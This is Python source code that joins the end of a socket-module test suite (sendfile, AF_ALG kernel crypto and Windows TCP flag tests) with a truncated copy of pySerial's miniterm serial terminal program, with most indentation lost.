shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
            self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
miniterm.py
|
#!C:\Users\reesj2\Downloads\WinPython-64bit-3.4.4.4Zero\python-3.4.4.amd64\python.exe
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
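# Illustrative sketch (not part of pySerial): the inverted context manager
# above means that *inside* a ``with console:`` block the terminal is back in
# its normal, line-buffered mode, so ordinary stdin reads work again, e.g.:
#
#     console = Console()
#     console.setup()                     # raw, single-key mode for the app
#     with console:                       # temporarily restore normal mode
#         filename = sys.stdin.readline().rstrip('\r\n')
#     # leaving the block calls setup() and re-enters raw mode
#
# This is the same pattern Miniterm.handle_menu_key() uses further below.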
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
                elif z in (unichr(0), unichr(0x0e)):    # function keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import select
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
# an additional pipe is used in getkey, so that the cancel method
# can abort the waiting getkey method
self.pipe_r, self.pipe_w = os.pipe()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
ready, _, _ = select.select([self.enc_stdin, self.pipe_r], [], [], None)
if self.pipe_r in ready:
os.read(self.pipe_r, 1)
return
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
os.write(self.pipe_w, b"x")
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
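# Illustrative sketch of the first idea above (not part of pySerial and not
# registered in TRANSFORMATIONS below, so it is never active by default):
# prefix received lines with a wall-clock timestamp.
class Timestamp(Transform):
    """Prefix received lines with the current time (illustrative sketch only)"""
    def rx(self, text):
        import time  # local import keeps the sketch self-contained
        stamp = time.strftime('[%H:%M:%S] ')
        # naive: stamps after every newline; a complete filter would buffer
        # partial lines so a stamp never lands in the middle of one
        return text.replace('\n', '\n' + stamp)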
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
        self.tx_encoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
